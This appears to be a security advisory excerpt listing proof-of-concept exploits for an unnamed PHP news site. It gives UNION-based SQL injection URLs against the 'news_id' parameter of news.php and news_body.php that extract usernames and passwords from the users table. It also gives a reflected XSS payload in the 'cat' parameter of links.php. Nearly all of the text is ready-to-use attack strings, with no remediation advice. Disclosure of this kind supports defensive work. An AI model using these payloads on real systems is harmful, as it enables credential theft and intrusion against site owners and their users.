# Original Advisory: www.bugreport.ir/?/50
1. Exploits/POCs:
1.1. Injection Flaws. SQL Injection in "/news.php" or "/news_body.php" in "news_id" parameter.
-------------
Find Admin's password:
http://[URL]/news.php?news_id=65 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12 from users/*
http://[URL]/news_body.php?news_id=65 union select 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12 from users/*
-------------
1.2. Cross Site Scripting (XSS). Reflected XSS attack in "/links.php" in "cat" parameter.
-------------
http://[URL]/links.php?cat=<script>alert(/XSS/.source)</script>
-------------